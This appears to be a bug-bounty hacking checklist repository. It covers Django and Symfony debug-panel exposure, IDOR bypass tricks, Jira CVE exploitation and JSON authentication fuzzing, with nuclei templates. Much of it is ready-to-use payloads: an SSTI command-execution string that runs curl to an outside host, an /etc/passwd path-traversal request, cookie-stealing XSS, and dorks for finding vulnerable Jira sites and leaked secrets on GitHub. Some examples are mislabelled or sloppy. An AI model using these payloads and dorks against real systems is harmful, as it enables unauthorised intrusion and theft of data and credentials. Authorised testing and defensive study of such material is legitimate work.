/Hacking Django/Django.md:
--------------------------------------------------------------------------------
1 | 1-Rce
2 | ```
3 | https://medium.com/@syedabuthahir/django-debug-mode-to-rce-in-microsoft-acquisition-189d27d08971
4 | ```
5 |
6 | 2- Exposing Django Debug Panel
7 | `
8 | https://hackerone.com/reports/2078707
9 | `
10 | ```
11 | /app/tmp/healthcheck.json
12 | /fxa-rp-events
13 |
14 | template:
15 | https://github.com/Az0x7/vulnerability-Checklist/blob/main/Hacking%20Django/exposing-django.yaml
16 | ```
17 |
18 |
19 | 3- use this wordlist for fuzzing
20 | ```
21 | https://github.com/six2dez/OneListForAll/blob/main/dict/django_long.txt
22 | ```
23 |
24 | 4- fuzz with path
25 |
26 | ```
27 | /bet_api
28 | /healthcheck
29 | /oidc
30 | rest-api/
31 | api-soap/
32 | api/v1/ums/
33 | api/v1/dms/
34 | api/v1/transaction/
35 | api/v1/log/
36 | api/v1/reports/
37 | api/v1/organization/
38 | api/v1/legal_entity/
39 | api/v1/tpdr/
40 | api/v1/integral_docs/
41 | api/v1/countries
42 | ```
43 |
--------------------------------------------------------------------------------
/Hacking Django/exposing-django.yaml:
--------------------------------------------------------------------------------
1 | id: exposing-django-debug-panel
2 | info:
3 | name: Exposing Django Debug Panel and Sensitive Infrastructure Information
4 | author: aliend89
5 | severity: high
6 | reference: https://hackerone.com/reports/2078707
7 |
8 | http:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}//app/tmp/healthcheck.json"
12 | - "{{BaseURL}}/fxa-rp-events"
13 | matchers:
14 | - type: word
15 | words:
16 | - "ADMIN_ENABLED"
17 | - "ALLOWED_HOSTS"
18 | - "AUTHENTICATION_BACKENDS"
19 | - "AUTH_USER_MODEL"
20 | - "AVATAR_IMG_SRC"
21 | - "AWS_REGION"
22 | - "AWS_SES_CONFIGSET"
23 | - "AWS_SNS_TOPIC"
24 | - "AWS_SQS_EMAIL_QUEUE_URL"
25 | - "AWS_SQS_QUEUE_URL"
26 | - "BASKET_ORIGIN"
27 | - "BUNDLE_PLAN_ID_US"
28 | - "CACHES"
29 | - "CORS_ALLOWED_ORIGINS"
30 | - "DATABASES"
31 | - "INSTALLED_APPS"
32 | - "INTERNAL_IPS"
33 | - "LOGGING"
34 | - "REST_FRAMEWORK"
35 |
36 | - type: status
37 | status:
38 | - 200
39 |
--------------------------------------------------------------------------------
/Hacking Symfony/Symfony.md:
--------------------------------------------------------------------------------
1 | 1-Rce
2 | ```
3 | https://medium.com/@bxrowski0x/3-symfony-rce-a-peek-behind-the-curtain-83da5433e149
4 | ```
5 |
6 | 2- use tool eos
7 | ```
8 | https://github.com/Synacktiv/eos
9 | ```
10 |
11 |
12 | 3- path with sensative data disclosure
13 | ```
14 | /_profiler
15 | /app_dev.php/_profiler
16 | /app_dev.php
17 | /_profiler/empty/search/results?limit=10
18 | /app_dev.php/_profiler/
19 | /app_dev.php/_profiler/phpinfo
20 | /app_dev.php/_profiler/open?file=app/config/parameters.yml
21 | /app/config/config_test.yml
22 | /_fragment
23 | /_internal
24 | /_proxy
25 | ```
26 |
27 | 4- secret fragment exploit
28 | ```
29 | https://github.com/ambionics/symfony-exploits
30 | http://web.archive.org/web/20230708081739/https://www.ambionics.io/blog/symfony-secret-fragment
31 | ```
32 |
33 | 5-use nuclie template
34 | ```
35 | https://github.com/Az0x7/vulnerability-Checklist/blob/main/Hacking%20Symfony/template_1.yaml
36 | https://github.com/Az0x7/vulnerability-Checklist/blob/main/Hacking%20Symfony/template_2.yaml
37 | https://github.com/Az0x7/vulnerability-Checklist/blob/main/Hacking%20Symfony/template_3.yaml
38 | https://github.com/Az0x7/vulnerability-Checklist/blob/main/Hacking%20Symfony/template_4.yaml
39 |
40 | ```
41 | 6- fuzz with
42 | ```
43 | https://github.com/six2dez/OneListForAll/blob/main/dict/symphony_long.txt
44 | ```
45 |
--------------------------------------------------------------------------------
/Hacking Symfony/template_1.yaml:
--------------------------------------------------------------------------------
1 | id: spring-eureka
2 |
3 | info:
4 | name: profiler disclosure
5 | author: Az0x7
6 | severity: high
7 | metadata:
8 | max-request: 1
9 | verified: true
10 | shodan-query: title:"Eureka"
11 | tags: exposure
12 |
13 | http:
14 | - method: GET
15 | path:
16 | - "{{BaseURL}}/_profiler"
17 | - "{{BaseURL}}/api/_profiler"
18 | - "{{BaseURL}}/admin/_profiler"
19 | - "{{BaseURL}}/admin/api/_profiler"
20 | - "{{BaseURL}}/app_dev.php/_profiler"
21 | - "{{BaseURL}}/api/app_dev.php/_profiler"
22 | - "{{BaseURL}}/_profiler/phpinfo"
23 | - "{{BaseURL}}/api/_profiler/phpinfo"
24 | - "{{BaseURL}}/admin/_profiler/phpinfo"
25 | - "{{BaseURL}}/admin/api/_profiler/phpinfo"
26 | - "{{BaseURL}}/app_dev.php/_profiler/phpinfo"
27 | - "{{BaseURL}}/api/app_dev.php/_profiler/phpinfo"
28 | matchers-condition: and
29 | matchers:
30 | - type: word
31 | part: body
32 | words:
33 | - 'symphony'
34 | - 'symphony profiler'
35 | - 'SYMPHONY_DOTENV_VARS'
36 | - 'APP_SECRET'
37 | - 'APP_ENV'
38 | condition: and
39 |
40 | - type: status
41 | status:
42 | - 200
43 |
--------------------------------------------------------------------------------
/Hacking Symfony/template_2.yaml:
--------------------------------------------------------------------------------
1 | id: spring-eureka
2 |
3 | info:
4 | name: profiler disclosure
5 | author: tess
6 | severity: high
7 | metadata:
8 | max-request: 1
9 | verified: true
10 | shodan-query: title:"Eureka"
11 | tags: exposure
12 |
13 | http:
14 | - method: GET
15 | path:
16 | - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
17 | - "{{BaseURL}}/api/_profiler/empty/search/results?limit=10"
18 | - "{{BaseURL}}/admin/_profiler/empty/search/results?limit=10"
19 | - "{{BaseURL}}/admin/api/_profiler/empty/search/results?limit=10"
20 | - "{{BaseURL}}/app_dev.php/_profiler/open?file=app/config/parameters.yml"
21 | - "{{BaseURL}}/app_dev.php/_profiler/phpinfo"
22 |
23 | matchers-condition: and
24 | matchers:
25 | - type: word
26 | part: body
27 | words:
28 | - 'symphony'
29 | - 'profiler'
30 | - 'profile search'
31 | condition: and
32 |
33 | - type: status
34 | status:
35 | - 200
36 |
--------------------------------------------------------------------------------
/Hacking Symfony/template_3.yaml:
--------------------------------------------------------------------------------
1 | id: symfony-debug-mode
2 | info:
3 | name: Symfony Debug Mode
4 | author: pdteam
5 | severity: high
6 |
7 | http:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/_profiler/open"
11 | - "{{BaseURL}}/index_dev.php"
12 |
13 | matchers-condition: and
14 | matchers:
15 | - type: word
16 | words:
17 | - "Symfony Profiler"
18 | - "Token not found"
19 | part: body
20 |
--------------------------------------------------------------------------------
/Hacking Symfony/template_4.yaml:
--------------------------------------------------------------------------------
1 | id: symfony-profiler-disclosure
2 |
3 | info:
4 | name: Symfony Profiler Disclosure
5 | author: pdteam
6 | severity: low
7 |
8 | http:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/_profiler/"
12 |
13 | matchers-condition: and
14 | matchers:
15 | - type: word
16 | words:
17 | - "Symfony Profiler"
18 | part: body
19 | - type: status
20 | status:
21 | - 200
22 |
--------------------------------------------------------------------------------
/IDOR Vulnerability/idor.md:
--------------------------------------------------------------------------------
1 | Base Steps:
2 | ```bash
3 | 1. Create two accounts if possible or else enumerate users first.
4 | 2. Check if the endpoint is private or public and does it contains any kind of id param.
5 | 3. Try changing the param value to some other user and see if does anything to their account.
6 | 4. Done !!
7 | ```
8 |
9 | [ ]
10 | [ ] image profilie
11 | [ ] delete acount
12 | [ ] infromation acount
13 | [ ] VIEW & DELETE & Create api_key
14 | [ ] allows to read any comment
15 | [ ] change price
16 | [ ] chnage the coin from dollar to uaro
17 | [ ] Try decode the ID, if the ID encoded using md5,base64,etc
18 | ```html
19 | GET /GetUser/dmljdGltQG1haWwuY29t
20 | [...]
21 | ```
22 |
23 | [ ] change HTTP method
24 | ```bash
25 | GET /users/delete/victim_id ->403
26 | POST /users/delete/victim_id ->200
27 | ```
28 |
29 | [ ] Try replacing parameter names
30 | ```bash
31 | Instead of this:
32 | GET /api/albums?album_id=<album id>
33 |
34 | Try This:
35 | GET /api/albums?account_id=<account id>
36 |
37 | Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.
38 | ```
39 |
40 | [ ] Path Traversal
41 | ```bash
42 | POST /users/delete/victim_id ->403
43 | POST /users/delete/my_id/..victim_id ->200
44 | ```
45 |
46 | [ ] change request content-type
47 | ```bash
48 | Content-Type: application/xml ->
49 | Content-Type: application/json
50 | ```
51 |
52 | [ ] swap non-numeric with numeric id
53 | ```bash
54 | GET /file?id=90djbkdbkdbd29dd
55 | GET /file?id=302
56 | ```
57 |
58 | [ ] Missing Function Level Acess Control
59 | ```bash
60 | GET /admin/profile ->401
61 | GET /Admin/profile ->200
62 | GET /ADMIN/profile ->200
63 | GET /aDmin/profile ->200
64 | GET /adMin/profile ->200
65 | GET /admIn/profile ->200
66 | GET /admiN/profile ->200
67 | ```
68 |
69 | [ ]send wildcard instead of an id
70 | ```bash
71 | GET /api/users/user_id ->
72 | GET /api/users/*
73 | ```
74 |
75 | [ ] Never ignore encoded/hashed ID
76 | ```bash
77 | for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD
78 | ```
79 |
80 | [ ] Google Dorking/public form
81 | ```bash
82 | search all the endpoints having ID which the search engine may have already indexed
83 | ```
84 |
85 | [ ] Bruteforce Hidden HTTP parameters
86 | ```bash
87 | use tools like arjun , paramminer
88 | ```
89 |
90 | [ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt
91 | ```bash
92 | GET /api_v1/messages ->200
93 | GET /api_v1/messages?user_id=victim_uuid ->200
94 | ```
95 |
96 | [ ] HTTP Parameter POllution Give mult value for same parameter
97 | ```bash
98 | GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
99 | GET /api_v1/messages?user_id=victim_id&user_id=attacker_id
100 | ```
101 |
102 | [ ] change file type
103 | ```bash
104 | GET /user_data/2341 -> 401
105 | GET /user_data/2341.json -> 200
106 | GET /user_data/2341.xml -> 200
107 | GET /user_data/2341.config -> 200
108 | GET /user_data/2341.txt -> 200
109 | ```
110 |
111 | [ ] json parameter pollution
112 | ```bash
113 | {"userid":1234,"userid":2542}
114 | ```
115 |
116 | [ ] Wrap the ID with an array in the body
117 | ```bash
118 | {"userid":123} ->401
119 | {"userid":[123]} ->200
120 | ```
121 |
122 | [ ] wrap the id with a json object
123 | ```bash
124 | {"userid":123} ->401
125 | {"userid":{"userid":123}} ->200
126 | ```
127 |
128 | [ ] Test an outdata API version
129 | ```bash
130 | GET /v3/users_data/1234 ->401
131 | GET /v1/users_data/1234 ->200
132 | ```
133 |
134 | [ ] If the website using graphql, try to find IDOR using graphql!
135 | ```bash
136 | GET /graphql
137 | [...]
138 | ```
139 | ```html
140 | GET /graphql.php?query=
141 | [...]
142 | ```
143 |
--------------------------------------------------------------------------------
/Jire Vulnerability/jire.md:
--------------------------------------------------------------------------------
1 | [ ] jirescan
2 | ```
3 | https://github.com/netspooky/jLoot
4 | https://github.com/0x48piraj/Jiraffe
5 | https://github.com/bcoles/jira_scan
6 | https://github.com/MayankPandey01/Jira-Lens
7 | nuclie template
8 | ```
9 | [ ] cve-2017-9506 (ssrf)
10 | ```
11 | Navigate to <JIRA_URL>/plugins/servlet/oauth/users/icon-url?consumerUri=<ssrf payload>
12 | ```
13 | [ ] cve-2018-20824 (xss)
14 | ```
15 | Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
16 | ```
17 | [ ] cve-2019-8451 (ssrf)
18 | ```
19 | Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
20 | ```
21 | [ ] cve-2019-8449 (user info disclosure)
22 | ```
23 | Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
24 | ```
25 | [ ] cve-2019-8442 (sen info disc)
26 | ```
27 | Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/ maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
28 | Observe that the pom.xml file is accessible.
29 | ```
30 | [ ] cve-2019-3403 (username enum)
31 | ```
32 | Navigate to <Jira_URL>/rest/api/2/user/ picker?query=<user_name_here>
33 | Observe the difference in response when valid vs. invalid user is queried.
34 | ```
35 | [ ] cve-2019-3402 (xss)
36 | ```
37 | Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
38 | Observe that the payload is getting executed.
39 | ```
40 | [ ] cve-2019-3396 (path traversal, rce)
41 | ```
42 | 1. Try Below POST Request with the JIRA Target
43 | 2. POST /rest/tinymce/1/macro/preview HTTP/1.1
44 | Host: {{Hostname}}
45 | Accept: */*
46 | Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_ 64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}}
47 | Content-Length: 168
48 | Connection: close <give an enter and remove this comment>
49 | {"contentId":"786457","macro":{" name":"widget","body":"","params":{"url":" https://www.viddler.com/v/23464dc5"," width":"1000","height":"1000","_template":"file:///etc/passwd"}}}
50 | ```
51 | [ ] cve-2019-11581 (template inj)
52 | ```
53 | Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
54 | Try SSTI payload in subject and/or body:
55 | $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()
56 | ```
57 | [ ] cve-2020-14179 (info disclosure)
58 | ```
59 | Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
60 | It leaks information about custom fields, custom SLA, etc.
61 | ```
62 | [ ] cve-2020-14178 (project key enumeration)
63 | ```
64 | Navigate to <JIRA_URL>/browse.<project_ key>
65 | Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
66 | ```
67 | [ ] cve-2020-14181 (user enumeration)
68 | ```
69 | Navigate to <JIRA_URL>/secure/ ViewUserHover.jspa?username=<username>
70 | Observe the response when valid vs. invalid username is provided.
71 | ```
72 | [ ] CVE-2022-26135 ( Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server )
73 | ```
74 | https://github.com/assetnote/jira-mobile-ssrf-exploit
75 | ```
76 | The following HTTP request can be used to reproduce this issue, once authenticated to the Jira instance:
77 | ```
78 | POST /rest/nativemobile/1.0/batch HTTP/2
79 | Host: issues.example.com
80 | Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
81 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
82 | Content-Type: application/json
83 | Accept: application/json, text/javascript, */*; q=0.01
84 | X-Requested-With: XMLHttpRequest
85 | Origin: https://issues.example.com
86 | Referer: https://issues.example.com/plugins/servlet/desk
87 | Accept-Encoding: gzip, deflate
88 | Accept-Language: en-US,en;q=0.9
89 | Content-Length: 63
90 |
91 | {"requests":[{"method":"GET","location":"@example.com"}]}
92 | ```
93 |
94 | [ ] Check Privileges
95 | Inside a Jira instance any user (even non-authenticated) can check its privileges in
96 | ```
97 | /rest/api/2/mypermissions or
98 | /rest/api/3/mypermissions
99 | ```
100 | These endpoints will return your current privileges.If a non-authenticated user have any privilege, this is a vulnerability (bounty?).If an authenticated user have any unexpected privilege, this a a vuln.
101 |
102 | ```
103 | #Check non-authenticated privileges
104 | curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
105 | ```
106 |
107 | [ ] CVE-2017-9506 , CVE-2019-8449 , CVE-2019-11581,CVE-2019-8451
108 | ```
109 | https://github.com/0x48piraj/Jiraffe
110 | ```
111 |
112 | [ ] cve-2018-5230
113 | ```
114 | https://hackerone.com/reports/380354
115 | https://jira.atlassian.com/browse/JRASERVER-67289
116 | HOW TO EXPLOIT: https://host/issues/?filter=-8
117 | Go to the link above
118 | Click the "Updated Range:" text area
119 | Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run.
120 | If it doesn't run chances are you used double quotes somewhere. Only use single quotes!
121 | ```
122 | [ ] CVE-2020-29453 (Pre-Auth Limited Arbitrary File Read)
123 | ```
124 | http://host/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
125 | if its not running redirecting to login panel then run it with curl
126 | ```
127 | [ ] CVE-2020-36287 (Atlassian JIRA: Incorrect Authorization)
128 | ```
129 | Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software) Affected Vesrion: Before version 8.13.5, and from version 8.14.0 before version 8.15.1 CVEID: CVE-2020-36287 CVSS Score: 5.3
130 | (Medium) CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 8.13.5, 8.15.1, 8.16.0
131 |
132 | Link: https://site.com/secure/Dashboard.jspa
133 | POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs
134 | POC: https://github.com/f4rber/CVE-2020-36287
135 | https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-36287/
136 | https://jira.atlassian.com/browse/JRASERVER-72258 [Anonymously accessible Dashboards can leak private information via configured gadgets CVE-2020-36287]
137 | ```
138 |
139 | [ ] CVE-2020-36289 (Atlassian Jira Unauth User Enumeration)
140 | ```
141 | Vulnerable:
142 | Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1
143 |
144 | Summary:
145 | The remote web server hosts a web application that is affected by an information disclosure vulnerability.
146 |
147 | Affected endpoint:
148 | https://example.com/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
149 |
150 | Description:
151 | The instance of Atlassian Jira hosted on the remote web server is affected by an information disclosure vulnerability in QueryComponentRendererValue!Default.jspa due to an improper access restriction. An unauthenticated, remote
152 | attacker can exploit this, by sending a specially crafted HTTP request, to disclose sensitive information which may aid in further attacks.
153 |
154 | References:
155 | https://jira.atlassian.com/browse/JRASERVER-71559
156 | http://www.nessus.org/u?b658a05a
157 | ```
158 |
159 | [ ] CVE-2021-26084 (Confluence Server Webwork OGNL Injection)
160 | ```
161 | https://github.com/march0s1as/CVE-2021-26084
162 | ```
163 |
164 | [ ] CVE-2021-26086 (Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include)
165 | ```
166 | PoC:
167 | https://github.com/ColdFusionX/CVE-2021-26086
168 | /_/;/WEB-INF/web.xml
169 | /_/;/WEB-INF/decorators.xml
170 | /_/;/WEB-INF/classes/seraph-config.xml
171 | /_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
172 | /_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
173 | /_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
174 | /_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
175 | /_/%3B/WEB-INF/web.xml
176 | /_/%3B/WEB-INF/decorators.xml
177 | /_/%3B/WEB-INF/classes/seraph-config.xml
178 | /_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
179 | /_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
180 | /_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
181 | /_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
182 |
183 |
184 | References:
185 | https://cloudsek.com/threatintelligence/jira-software-server-cve-2021-26086-vulnerability-actively-exploited-in-the-wild
186 | https://github.com/ColdFusionX/CVE-2021-26086
187 | https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/jira_cve_2021-26086.txt
188 | ```
189 |
190 | [ ] CVE-2022-0540 - Atlassian Jira Authentication Bypass
191 | ```
192 | https://github.com/Pear1y/CVE-2022-0540-RCE
193 | ```
194 |
195 | [ ] Google dork section
196 | ```
197 | inurl:/plugins/servlet/wallboard/
198 | (This will give all the Jira dashboard which might be vulnerable to XSS.) (Sensitive Data Exposure)
199 | https://www.exploit-db.com/ghdb/6528
200 | This is testing for confluence(Older version) Found CVE:-2018-20824
201 |
202 | Created dork: inurl:"/plugins/servlet/Wallboard/"
203 | EP:/?dashboardId=10102&dashboardId=10103&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=fadeZoom&random=false
204 | https://twitter.com/hackersden_/status/1417573513859244032
205 |
206 | Useful Jira dorks:
207 | inurl:"dashboard.jspa"
208 | inurl:xyz intitle:JIRA login
209 | site:*/JIRA/login
210 | intitle:"Log In JIRA" inurl:"8080:/login.jsp"
211 | intext:"Welcome to JIRA" "Powered by a free Atlassian Jira community"
212 | inurl:companyname intitle:JIRA login
213 | inurl:visma intitle:JIRA login
214 | intext:"Confluence" ext:jsp intitle:"Jira"
215 | inurl:http://confluence. login.action
216 | inurl:https://wiki. .com/confluence/
217 | allinurl: /confluence/login.action?
218 | intitle:dashboard-confluence
219 | inurl:/ContactAdministrators!default.jspa
220 | inurl:/secure/attachment/ filetype:log OR filetype:txt
221 | ```
222 | [ ] Github recon
223 | ```
224 | Github recon Via github dorks to find secret:-
225 | "site[dot]com" send_keys
226 | "site[dot]com" client_secret
227 | "site[dot]com" jira/root password
228 | ```
229 |
230 | [ ]
231 |
--------------------------------------------------------------------------------
/Json Attack/json.md:
--------------------------------------------------------------------------------
1 | 97 JSON Tests for for Authentication Endpoints link pdf [link](https://www.linkedin.com/feed/update/urn:li:activity:7097279293608607746/)
2 |
3 | 1. Basic credentials
4 | ```
5 | {
6 | "login": "admin",
7 | "password": "admin"
8 | }
9 | ```
10 |
11 | 2. Empty credentials:
12 | ```
13 | {
14 | "login": "",
15 | "password": ""
16 | }
17 | ```
18 |
19 | 3- Null values:
20 | ```
21 | {
22 | "login": null,
23 | "password": null
24 | }
25 | ```
26 |
27 | 4. Credentials as numbers:
28 | ```
29 | {
30 | "login": 123,
31 | "password": 456
32 | }
33 | ```
34 |
35 | 6. Credentials as booleans:
36 | ```
37 | {
38 | "login": true,
39 | "password": false
40 | }
41 | ```
42 |
43 | 7. Credentials as arrays:
44 | ```
45 | {
46 | "login": ["admin"],
47 | "password": ["password"]
48 | }
49 | ```
50 |
51 | 8. Credentials as objects:
52 | ```
53 | {
54 | "login": {"username": "admin",
55 | "password": {"password": "password"}}
56 | }
57 | ```
58 |
59 | 9. Special characters in credentials:
60 | ```
61 | {
62 | "login": "@dm!n",
63 | "password": "p@ssw0rd#"
64 | }
65 | ```
66 |
67 | 10. SQL Injection:
68 | ```
69 | {
70 | "login": "admin' --",
71 | "password": "password"
72 | }
73 | ```
74 |
75 | 11. HTML tags in credentials:
76 | ```
77 | {
78 | "login": "<h1>admin</h1>",
79 | "password": "ololo-HTML-XSS"
80 | }
81 | ```
82 |
83 | 12. Unicode in credentials:
84 | ```
85 | {
86 | "login": "\u0061\u0064\u006D\u0069\u006E",
87 | "password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064"
88 | }
89 | ```
90 |
91 | 13. Credentials with escape characters:
92 | ```
93 | {
94 | "login": "ad\\nmin",
95 | "password": "pa\\ssword"
96 | }
97 | ```
98 |
99 | 14. Credentials with white space:
100 | ```
101 | {
102 | "login": " ",
103 | "password": " "
104 | }
105 | ```
106 |
107 | 15. Overlong values:
108 | ```
109 | {
110 | "login": "a"*10000,
111 | "password": "b"*10000
112 | }
113 |
114 | ```
115 | 16. Malformed JSON (missing brace):
116 | ```
117 | {
118 | "login": "admin",
119 | "password": "admin"
120 | }
121 | ```
122 |
123 | 17. Malformed JSON (extra comma):
124 | ```
125 | {
126 | "login": "admin",
127 | "password": "admin",
128 | }
129 | ```
130 |
131 | 18. Missing login key:
132 | ```
133 | {
134 | "password": "admin"
135 | }
136 | ```
137 |
138 | 19. Missing password key:
139 | ```
140 | {
141 | "login": "admin"
142 | }
143 | ```
144 |
145 | 20. Swapped key values:
146 | ```
147 | {
148 | "admin": "login",
149 | "password": "password"
150 | }
151 | ```
152 |
153 | 21. Extra keys:
154 | ```
155 | {
156 | "login": "admin",
157 | "password": "admin",
158 | "extra": "extra"
159 | }
160 | ```
161 |
162 | 22. Missing colon:
163 | ```
164 | {
165 | "login" "admin",
166 | "password": "password"
167 | }
168 | ```
169 |
170 | 23. Invalid Boolean as credentials:
171 | ```
172 | {
173 | "login": yes,
174 | "password": no
175 | }
176 | ```
177 |
178 | 25. All keys, no values:
179 | ```
180 | {
181 | "": "",
182 | "": ""
183 | }
184 | ```
185 |
186 | 26. Nested objects:
187 | ```
188 | {
189 | "login": {"innerLogin": "admin",
190 | "password": {"innerPassword": "password"}}
191 | }
192 | ```
193 | 27. Case sensitivity testing:
194 | ```
195 | {
196 | "LOGIN": "admin",
197 | "PASSWORD": "password"
198 | }
199 | ```
200 |
201 | 28. Login as a number, password as a string:
202 | ```
203 | {
204 | "login": 1234,
205 | "password": "password"
206 | }
207 | ```
208 |
209 | 29. Login as a string, password as a number:
210 | ```
211 | {
212 | "login": "admin",
213 | "password": 1234
214 | }
215 | ```
216 |
217 | 30. Repeated keys:
218 | ```
219 | {
220 | "login": "admin",
221 | "login": "user",
222 | "password": "password"
223 | }
224 | ```
225 | 31. Single quotes instead of double:
226 | ```
227 | {
228 | 'login': 'admin',
229 | 'password': 'password'
230 | }
231 | ```
232 | 33. Login and password with only special characters:
233 | ```
234 | {
235 | "login": "@#$%^&*",
236 | "password": "!@#$%^&*"
237 | }
238 | ```
239 | 34. Unicode escape sequence:
240 | ```
241 | {
242 | "login": "\u0041\u0044\u004D\u0049\u004E",
243 | "password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044"
244 | }
245 | ```
246 |
247 | 35. Value as object instead of string:
248 | ```
249 | {
250 | "login": {"$oid":
251 | "507c7f79bcf86cd7994f6c0e"},
252 | "password": "password"}
253 | }
254 | ```
255 |
256 | 37. Nonexistent variables as values:
257 | ```
258 | {
259 | "login": undefined,
260 | "password": undefined
261 | }
262 | ```
263 |
264 | 38. Extra nested objects:
265 | ```
266 | {
267 | "login": "admin",
268 | "password": "password",
269 | "extra": {"key1": "value1",
270 | "key2": "value2"}
271 | }
272 |
273 | ```
274 |
275 | 39. Hexadecimal values:
276 | ```
277 | {
278 | "login": "0x1234",
279 | "password": "0x5678"
280 | }
281 | ```
282 |
283 | 40. Extra symbols after valid JSON:
284 | ```
285 | {
286 | "login": "admin",
287 | "password": "password"}@@@@@@
288 | }
289 | ```
290 |
291 | 41. Only keys, without values:
292 | ```
293 | {
294 | "login":,
295 | "password":
296 | }
297 | ```
298 |
299 | 42. Insertion of control characters:
300 | ```
301 | {
302 | "login": "ad\u0000min",
303 | "password": "pass\u0000word"
304 | }
305 | ```
306 |
307 | 43. Long Unicode Strings:
308 | ```
309 | {
310 | "login": "\u0061"*10000,
311 | "password": "\u0061"*10000
312 | }
313 | ```
314 |
315 | 44. Newline Characters in Strings:
316 | ```
317 | {
318 | "login": "ad\nmin",
319 | "password": "pa\nssword"
320 | }
321 | ```
322 |
323 | 45. Tab Characters in Strings:
324 | ```
325 | {
326 | "login": "ad\tmin",
327 | "password": "pa\tssword"
328 | }
329 | ```
330 |
331 | 46. Test with HTML content in Strings:
332 | ```
333 | {
334 | "login": "<b>admin",
335 | "password": "password"
336 | }
337 | ```
338 |
339 | 47. JSON Injection in Strings:
340 | ```
341 | {
342 | "login": "{\"injection\":\"value\"}",
343 | "password": "password"
344 | }
345 | ```
346 |
347 | 48. Test with XML content in Strings:
348 | ```
349 | {
350 | "login": "admin",
351 | "password": "password"
352 | }
353 | ```
354 |
355 | 49. Combination of Number, Strings, and Special characters:
356 | ```
357 | {
358 | "login": "ad123min!@",
359 | "password": "pa55w0rd!@"
360 | }
361 | ```
362 |
363 | 50. Use of environment variables:
364 | ```
365 | {
366 | "login": "${USER}",
367 | "password": "${PASS}"
368 | }
369 | ```
370 |
371 | 51. Backslashes in Strings:
372 | ```
373 | {
374 | "login": "ad\\min",
375 | "password": "pa\\ssword"
376 | }
377 | ```
378 |
379 | 52. Long strings of special characters:
380 | ```
381 | {
382 | "login": "!@#$%^&*()"*1000,
383 | "password": "!@#$%^&*()"*1000
384 | }
385 | ```
386 |
387 | 53. Empty Key in JSON:
388 | ```
389 | {
390 | "": "admin",
391 | "password": "password"
392 | }
393 | ```
394 |
395 | 55. JSON Injection in Key:
396 | ```
397 | {
398 | "{\"injection\":\"value\"}
399 | ": "admin",
400 | "password": "password"
401 | }
402 | ```
403 |
404 | 56. Quotation marks in strings:
405 | ```
406 | {
407 | "login": "\"admin\"",
408 | "password": "\"password\""
409 | }
410 | ```
411 |
412 | 57. Credentials as nested arrays:
413 | ```
414 | {
415 | "login": [["admin"]],
416 | "password": [["password"]]
417 | }
418 | ```
419 |
420 | 58. Credentials as nested objects:
421 | ```
422 | {
423 | "login": {"username": {"value": "admin",
424 | "password": {"password": {"value":
425 | "password"
426 | }
427 | ```
428 |
429 | 59. Keys as numbers:
430 | ```
431 | {
432 | 123: "admin",
433 | 456: "password"
434 | }
435 | ```
436 |
